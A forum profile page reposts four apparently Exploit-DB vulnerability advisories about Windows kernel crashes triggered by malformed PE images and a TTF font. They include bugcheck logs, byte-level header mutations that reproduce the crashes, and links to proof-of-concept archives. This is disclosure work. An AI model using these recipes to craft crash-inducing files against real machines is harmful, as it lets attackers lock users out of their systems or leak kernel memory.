HireHackking

Everything posted by HireHackking

  1. We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:

     --- cut ---
     *** Fatal System Error: 0x00000050 (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000)
     Driver at fault:
     ***    CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d
     .
     Break instruction exception - code 80000003 (first chance)
     A fatal system error has occurred.
     Debugger entered on first try; Bugcheck callbacks have not been invoked.
     A fatal system error has occurred.
     [...]
     *******************************************************************************
     *                                                                             *
     *                        Bugcheck Analysis                                    *
     *                                                                             *
     *******************************************************************************
     PAGE_FAULT_IN_NONPAGED_AREA (50)
     Invalid system memory was referenced. This cannot be protected by try-except.
     Typically the address is just plain bad or it is pointing at freed memory.
     Arguments:
     Arg1: fffff8007b6e00ac, memory referenced.
     Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
     Arg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory address.
     Arg4: 0000000000000000, (reserved)
     [...]
     TRAP_FRAME:  fffffa8375df1860 -- (.trap 0xfffffa8375df1860)
     NOTE: The trap frame does not contain all registers.
     Some register values may be zeroed or incorrect.
     rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000
     rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
     rip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30
      r8=00000000000000c0  r9=fffff8007b6d0080 r10=0000000000000004
     r11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei ng nz ac po cy
     CI!CipFixImageType+0x9d:
     fffff800`79a7e5c1 418b44cb3c      mov     eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=????????
     Resetting default scope
     LAST_CONTROL_TRANSFER:  from fffff80077ea6642 to fffff80077dc46a0
     STACK_TEXT:
     fffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus
     fffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12
     fffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952
     fffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107
     fffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171
     fffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f
     fffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360
     fffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d
     fffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279
     fffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6
     fffffa83`75df1c60 fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436
     fffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6
     fffffa83`75df1eb0 fffff800`781dca20 : ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad
     fffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
     fffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
     fffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
     fffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
     fffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
     000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
     000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
     000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
     000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
     000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39
     000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
     [...]
     --- cut ---

     The direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field. We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9).

     The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could also potentially be exploited as a limited information disclosure primitive.

     Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.

     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47486.zip
  2. We have encountered a Windows kernel crash in the win32k.sys driver while processing a corrupted TTF font file. An example crash log excerpt generated after triggering the bug is shown below:

     --- cut ---
     *** Fatal System Error: 0x00000050 (0xFFFFF900C1E1C003,0x0000000000000001,0xFFFFF9600006D2A8,0x0000000000000000)
     Driver at fault:
     ***    win32k.sys - Address FFFFF9600006D2A8 base at FFFFF96000010000, DateStamp 5d0c4490
     [...]
     1: kd> !analyze -v
     *******************************************************************************
     *                                                                             *
     *                        Bugcheck Analysis                                    *
     *                                                                             *
     *******************************************************************************
     PAGE_FAULT_IN_NONPAGED_AREA (50)
     Invalid system memory was referenced. This cannot be protected by try-except.
     Typically the address is just plain bad or it is pointing at freed memory.
     Arguments:
     Arg1: fffff900c1e1c003, memory referenced.
     Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
     Arg3: fffff9600006d2a8, If non-zero, the instruction address which referenced the bad memory address.
     Arg4: 0000000000000000, (reserved)
     [...]
     TRAP_FRAME:  fffff880082791f0 -- (.trap 0xfffff880082791f0)
     NOTE: The trap frame does not contain all registers.
     Some register values may be zeroed or incorrect.
     rax=0000000000000000 rbx=0000000000000000 rcx=fffff900c1e1bfb8
     rdx=000000000000000a rsi=0000000000000000 rdi=0000000000000000
     rip=fffff9600006d2a8 rsp=fffff88008279380 rbp=000000000000000c
      r8=fffff960002f5750  r9=0000000000000002 r10=fffff900c1e1bfe9
     r11=fffff900c1e1bff3 r12=0000000000000000 r13=0000000000000000
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei pl nz na po nc
     win32k!ulClearTypeFilter+0x214:
     fffff960`0006d2a8 8807            mov     byte ptr [rdi],al ds:00000000`00000000=??
     Resetting default scope
     LAST_CONTROL_TRANSFER:  from fffff80002b65a22 to fffff80002ab1520
     STACK_TEXT:
     fffff880`08278928 fffff800`02b65a22 : fffff900`c1e1c003 fffffa80`310f1b50 00000000`00000065 fffff800`02a82658 : nt!RtlpBreakWithStatusInstruction
     fffff880`08278930 fffff800`02b66812 : fffff880`00000003 fffff880`082791f0 fffff800`02aba420 fffff880`08278f90 : nt!KiBugCheckDebugBreak+0x12
     fffff880`08278990 fffff800`02aaada4 : 00000000`00000068 fffff880`08279450 00000000`00010000 00000000`00000000 : nt!KeBugCheck2+0x722
     fffff880`08279060 fffff800`02b847b2 : 00000000`00000050 fffff900`c1e1c003 00000000`00000001 fffff880`082791f0 : nt!KeBugCheckEx+0x104
     fffff880`082790a0 fffff800`02ab6ddc : 00000000`00000001 fffff900`c1e1c003 00000000`00000000 fffff900`c1e1bf94 : nt!MmAccessFault+0x2322
     fffff880`082791f0 fffff960`0006d2a8 : 00000000`00000000 fffff800`00000001 fffff880`08279450 fffff900`c1e1bf94 : nt!KiPageFault+0x35c
     fffff880`08279380 fffff960`0007097a : fffff900`c1a40010 fffff900`c1a40010 fffff880`08279928 00000000`00000002 : win32k!ulClearTypeFilter+0x214
     fffff880`08279400 fffff960`0006ce00 : fffff880`0827b67b fffff880`08279928 fffff900`c1b71010 fffff960`00000b70 : win32k!xInsertMetricsPlusRFONTOBJ+0x20e
     fffff880`082794d0 fffff960`0006caa0 : fffff880`08279a00 fffff880`08279928 00000000`00000000 00000000`0000000a : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f0
     fffff880`08279550 fffff960`0006c498 : 00000000`00000000 fffff880`082796f0 fffff900`c00cb010 00000000`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
     fffff880`082795d0 fffff960`0006d955 : 00000000`41800000 00000000`00000000 00000000`00000007 fffff880`082796f0 : win32k!ESTROBJ::vInit+0x350
     fffff880`08279660 fffff960`0006d5f7 : fffff880`08279b60 fffff900`c1a40010 fffffa80`00000020 00000000`ffffffff : win32k!GreGetTextExtentExW+0x275
     fffff880`08279920 fffff800`02ab8d53 : 00000000`5a010611 fffff880`00000b40 00000000`00000040 00000000`00000000 : win32k!NtGdiGetTextExtentExW+0x237
     fffff880`08279a70 00000000`74da204a : 00000000`74d8c46f 00000000`00010000 00000000`74d8b947 00000000`002ff888 : nt!KiSystemServiceCopyEnd+0x13
     00000000`001adca8 00000000`74d8c46f : 00000000`00010000 00000000`74d8b947 00000000`002ff888 00000000`75ad5600 : wow64win!NtGdiGetTextExtentExW+0xa
     00000000`001adcb0 00000000`74dcd18f : 00000000`002ff88c 00000000`7efdb000 00000000`7efdb000 00000000`7efdd000 : wow64win!whNtGdiGetTextExtentExW+0x43
     00000000`001add00 00000000`74d52776 : 00000000`779a01e4 00000000`74dc0023 00000000`00000246 00000000`002ffeec : wow64!Wow64SystemServiceEx+0xd7
     00000000`001ae5c0 00000000`74dcd286 : 00000000`00000000 00000000`74d51920 00000000`777d3128 00000000`7780c4f1 : wow64cpu!ServiceNoTurbo+0x2d
     00000000`001ae680 00000000`74dcc69e : 00000000`00000000 00000000`00000000 00000000`74dc4b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa
     00000000`001ae6d0 00000000`778043c3 : 00000000`004f2d50 00000000`00000000 00000000`77902e70 00000000`777d7550 : wow64!Wow64LdrpInitialize+0x42a
     00000000`001aec20 00000000`77869780 : 00000000`00000000 00000000`77876c7d 00000000`001af1d0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3
     00000000`001af110 00000000`7781371e : 00000000`001af1d0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x22790
     00000000`001af180 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe
     --- cut ---

     The type of the bugcheck implies a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf", "hmtx" and "prep" tables. The issue reproduces on Windows 7 and Windows Server 2008 R2 (64-bit), with and without Special Pools enabled for win32k.sys.

     Attached is an archive with the proof-of-concept mutated TTF file, the original font used to generate it and the source code of a simple harness program, which loads the given font and displays all of its glyphs at different point sizes on the screen. Running the harness against the provided font is required to trigger the crash, and it only occurs after a few seconds (while processing the 2nd LOGFONT).

     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47484.zip
  3. We have encountered a Windows kernel crash in memcpy() called by nt!MiParseImageLoadConfig while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:

     --- cut ---
     *** Fatal System Error: 0x00000050 (0xFFFFF805751F5000,0x0000000000000000,0xFFFFF805773CF6E5,0x0000000000000000)
     Break instruction exception - code 80000003 (first chance)
     A fatal system error has occurred.
     Debugger entered on first try; Bugcheck callbacks have not been invoked.
     A fatal system error has occurred.
     [...]
     *******************************************************************************
     *                                                                             *
     *                        Bugcheck Analysis                                    *
     *                                                                             *
     *******************************************************************************
     PAGE_FAULT_IN_NONPAGED_AREA (50)
     Invalid system memory was referenced. This cannot be protected by try-except.
     Typically the address is just plain bad or it is pointing at freed memory.
     Arguments:
     Arg1: fffff805751f5000, memory referenced.
     Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
     Arg3: fffff805773cf6e5, If non-zero, the instruction address which referenced the bad memory address.
     Arg4: 0000000000000000, (reserved)
     [...]
     TRAP_FRAME:  ffff8380cd506820 -- (.trap 0xffff8380cd506820)
     NOTE: The trap frame does not contain all registers.
     Some register values may be zeroed or incorrect.
     rax=000000000000005c rbx=0000000000000000 rcx=ffff8380cd506c80
     rdx=00007484a7cee364 rsi=0000000000000000 rdi=0000000000000000
     rip=fffff805773cf6e5 rsp=ffff8380cd5069b8 rbp=ffff8380cd506fb0
      r8=0000000000000008  r9=0000000000000003 r10=000000000000020b
     r11=ffff8380cd506be0 r12=0000000000000000 r13=0000000000000000
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei pl nz na po nc
     nt!memcpy+0xa5:
     fffff805`773cf6e5 f30f6f4c1110    movdqu  xmm1,xmmword ptr [rcx+rdx+10h] ds:fffff805`751f4ff4=????????????????????????????????
     Resetting default scope
     LAST_CONTROL_TRANSFER:  from fffff805774a6642 to fffff805773c46a0
     STACK_TEXT:
     ffff8380`cd505dd8 fffff805`774a6642 : fffff805`751f5000 00000000`00000003 ffff8380`cd505f40 fffff805`77322be0 : nt!DbgBreakPointWithStatus
     ffff8380`cd505de0 fffff805`774a5d32 : fffff805`00000003 ffff8380`cd505f40 fffff805`773d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
     ffff8380`cd505e40 fffff805`773bca07 : fffff078`3c1e0f80 fffff805`774d0110 00000000`00000000 fffff805`77663900 : nt!KeBugCheck2+0x952
     ffff8380`cd506540 fffff805`773e0161 : 00000000`00000050 fffff805`751f5000 00000000`00000000 ffff8380`cd506820 : nt!KeBugCheckEx+0x107
     ffff8380`cd506580 fffff805`7727aaef : fffff805`77663900 00000000`00000000 00000000`00000000 fffff805`751f5000 : nt!MiSystemFault+0x1d3171
     ffff8380`cd506680 fffff805`773ca920 : ffff8380`cd5068b0 fffff805`773caa4e fffff805`75000000 fffff078`3c1f1000 : nt!MmAccessFault+0x34f
     ffff8380`cd506820 fffff805`773cf6e5 : fffff805`7788397d ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 : nt!KiPageFault+0x360
     ffff8380`cd5069b8 fffff805`7788397d : ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 ffff8d03`15cab288 : nt!memcpy+0xa5
     ffff8380`cd5069c0 fffff805`7788238e : fffff805`75000000 ffffaf0f`9d705048 00000000`00000000 00000000`001f5000 : nt!MiParseImageLoadConfig+0x171
     ffff8380`cd506d40 fffff805`777fc8a3 : ffff8380`cd507180 ffff8380`cd507180 ffff8380`cd506fb0 ffff8380`cd507180 : nt!MiRelocateImage+0x2fe
     ffff8380`cd506eb0 fffff805`777dca20 : ffff8d03`1526e520 ffff8380`cd507180 ffff8380`cd507180 ffff8d03`1526e4f0 : nt!MiCreateNewSection+0x5ef
     ffff8380`cd507010 fffff805`777dcd24 : ffff8380`cd507040 ffffaf0f`9d530760 ffff8d03`1526e520 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
     ffff8380`cd507100 fffff805`777dc37f : 00000000`11000000 ffff8380`cd5074c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
     ffff8380`cd507280 fffff805`777dc110 : 000000c1`e89f8e28 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
     ffff8380`cd507360 fffff805`773ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
     ffff8380`cd5073d0 00007ff8`2fa5c9a4 : 00007ff8`2d7c1ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
     000000c1`e89f8db8 00007ff8`2d7c1ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
     000000c1`e89f8dc0 00007ff8`2d7c5640 : 000001d3`61bac500 0000002e`00000000 00007ff8`2f292770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
     000000c1`e89f8ff0 00007ff8`2d7ac41d : 000001d3`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
     000000c1`e89f9060 00007ff8`2dd503d1 : 000001d3`61bd1d10 00000000`00000000 000001d3`61bb94d0 00007ff8`2dd66d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
     000000c1`e89f90c0 00007ff8`2dd5035c : 00000000`00000000 00007ff8`2ced10ff 000001d3`61bd1d10 000000c1`e89f9410 : shell32!_LoadVersionInfo+0x39
     000000c1`e89f9130 00007ff8`2cf4c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
     000000c1`e89f9160 00007ff8`2cee23d4 : 00000000`00000080 00000000`00000000 00000000`80004002 00000000`f20003f1 : windows_storage!InitializeFileHandlerWithFile+0xc9
     [...]
     --- cut ---

     We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file, which changes the Load Configuration Directory address from 0x1e4644 to 0x1f4f44. The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW().

     In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could also potentially be exploited as a limited information disclosure primitive.

     Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.

     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47487.zip
  4. We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:

     --- cut ---
     *** Fatal System Error: 0x00000050 (0xFFFFF80068F02000,0x0000000000000000,0xFFFFF80067291A2C,0x0000000000000000)
     Driver at fault:
     ***    CI.dll - Address FFFFF80067291A2C base at FFFFF80067230000, DateStamp 8581dc0d
     .
     Break instruction exception - code 80000003 (first chance)
     A fatal system error has occurred.
     Debugger entered on first try; Bugcheck callbacks have not been invoked.
     A fatal system error has occurred.
     [...]
     *******************************************************************************
     *                                                                             *
     *                        Bugcheck Analysis                                    *
     *                                                                             *
     *******************************************************************************
     PAGE_FAULT_IN_NONPAGED_AREA (50)
     Invalid system memory was referenced. This cannot be protected by try-except.
     Typically the address is just plain bad or it is pointing at freed memory.
     Arguments:
     Arg1: fffff80068f02000, memory referenced.
     Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
     Arg3: fffff80067291a2c, If non-zero, the instruction address which referenced the bad memory address.
     Arg4: 0000000000000000, (reserved)
     [...]
     TRAP_FRAME:  ffffe20f4b7d6400 -- (.trap 0xffffe20f4b7d6400)
     NOTE: The trap frame does not contain all registers.
     Some register values may be zeroed or incorrect.
     rax=00000000000000c8 rbx=0000000000000000 rcx=144670b8d60e0000
     rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
     rip=fffff80067291a2c rsp=ffffe20f4b7d6590 rbp=ffffe20f4b7d6690
      r8=00000000fffffe00  r9=fffff80068ef0000 r10=0000000000000002
     r11=ffffe20f4b7d6760 r12=0000000000000000 r13=0000000000000000
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei pl nz na pe nc
     CI!HashKComputeFirstPageHash+0x1f4:
     fffff800`67291a2c 418b5dd4        mov     ebx,dword ptr [r13-2Ch] ds:ffffffff`ffffffd4=????????
     Resetting default scope
     LAST_CONTROL_TRANSFER:  from fffff80065aa6642 to fffff800659c46a0
     STACK_TEXT:
     ffffe20f`4b7d59b8 fffff800`65aa6642 : fffff800`68f02000 00000000`00000003 ffffe20f`4b7d5b20 fffff800`65922be0 : nt!DbgBreakPointWithStatus
     ffffe20f`4b7d59c0 fffff800`65aa5d32 : fffff800`00000003 ffffe20f`4b7d5b20 fffff800`659d0fb0 ffffe20f`4b7d6060 : nt!KiBugCheckDebugBreak+0x12
     ffffe20f`4b7d5a20 fffff800`659bca07 : ffff8bc5`e2f17f80 fffff800`65ad0110 00000000`00000000 fffff800`65c63900 : nt!KeBugCheck2+0x952
     ffffe20f`4b7d6120 fffff800`659e0161 : 00000000`00000050 fffff800`68f02000 00000000`00000000 ffffe20f`4b7d6400 : nt!KeBugCheckEx+0x107
     ffffe20f`4b7d6160 fffff800`6587aaef : fffffb00`023b21b0 00000000`00000000 00000000`00000000 fffff800`68f02000 : nt!MiSystemFault+0x1d3171
     ffffe20f`4b7d6260 fffff800`659ca920 : ffffe20f`4b7d6860 00000000`00000000 00000000`00000200 fffff800`65c651c0 : nt!MmAccessFault+0x34f
     ffffe20f`4b7d6400 fffff800`67291a2c : 00000000`00000000 ffffe20f`4b7d6690 00000000`00000000 00000000`00001000 : nt!KiPageFault+0x360
     ffffe20f`4b7d6590 fffff800`67280829 : 00000000`00000000 ffffce0d`8ae71003 ffffac8f`23a2a9e8 00000000`00000000 : CI!HashKComputeFirstPageHash+0x1f4
     ffffe20f`4b7d67c0 fffff800`6727f10d : ffffac8f`23a2a5a0 ffffce0d`8ae71080 ffffce0d`00000000 00000000`00000000 : CI!CipGetEmbeddedSignatureAndFindFirstMatch+0x181
     ffffe20f`4b7d6860 fffff800`6727e89a : ffffac8f`23a2a5a0 ffffce0d`8b7e1d50 ffffce0d`8ae71080 fffff800`68ef0000 : CI!CipValidatePageHash+0xfd
     ffffe20f`4b7d6950 fffff800`6727cc8b : fffff800`6727f010 ffffe20f`4b7d6c8c ffffce0d`8b7e1d50 ffffce0d`8ae71080 : CI!CipValidateImageHash+0xe6
     ffffe20f`4b7d6a30 fffff800`65e85766 : ffffe20f`4b7d6c70 fffff800`68ef0000 00000000`0000000e fffff800`68ef0000 : CI!CiValidateImageHeader+0x68b
     ffffe20f`4b7d6bb0 fffff800`65e8528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00012000 : nt!SeValidateImageHeader+0xd6
     ffffe20f`4b7d6c60 fffff800`65e1e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436
     ffffe20f`4b7d6e50 fffff800`65dfc861 : ffffe20f`4b7d7180 ffffe20f`4b7d6fb0 00000000`40000000 ffffe20f`4b7d7180 : nt!MiValidateSectionSigningPolicy+0xa6
     ffffe20f`4b7d6eb0 fffff800`65ddca20 : ffffce0d`8b7e1d50 ffffe20f`4b7d7180 ffffe20f`4b7d7180 ffffce0d`8b7e1d20 : nt!MiCreateNewSection+0x5ad
     ffffe20f`4b7d7010 fffff800`65ddcd24 : ffffe20f`4b7d7040 ffffac8f`2af6a9f0 ffffce0d`8b7e1d50 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
     ffffe20f`4b7d7100 fffff800`65ddc37f : 00000000`11000000 ffffe20f`4b7d74c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
     ffffe20f`4b7d7280 fffff800`65ddc110 : 00000010`0e3f8dc8 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
     ffffe20f`4b7d7360 fffff800`659ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
     ffffe20f`4b7d73d0 00007ffe`c317c9a4 : 00007ffe`c0511ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
     00000010`0e3f8d58 00007ffe`c0511ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
     00000010`0e3f8d60 00007ffe`c0515640 : 00000129`5f442be0 0000001b`00000000 00007ffe`c1f72770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
     00000010`0e3f8f90 00007ffe`c04fc41d : 00000129`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
     00000010`0e3f9000 00007ffe`c16903d1 : 00000129`5f414f00 00000000`00000000 00000129`5f443840 00007ffe`c16a6d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
     00000010`0e3f9060 00007ffe`c169035c : 00000000`00000000 00007ffe`c08710ff 00000129`5f414f00 00000010`0e3f93b0 : shell32!_LoadVersionInfo+0x39
     00000010`0e3f90d0 00007ffe`c08ec1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
     [...]
     --- cut ---

     We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which decreases NumberOfSections from 4 to 3, one which increases SizeOfOptionalHeader from 0xF0 to 0xCEF0, and one which changes DllCharacteristics from 0 to 0x00FF (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | 0xf). The issue reproduces on Windows 10 and Windows Server 2019 64-bit (Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW().

     In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could also potentially be exploited as a limited information disclosure primitive.

     Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and one additional non-minimized sample. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.

     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47488.zip
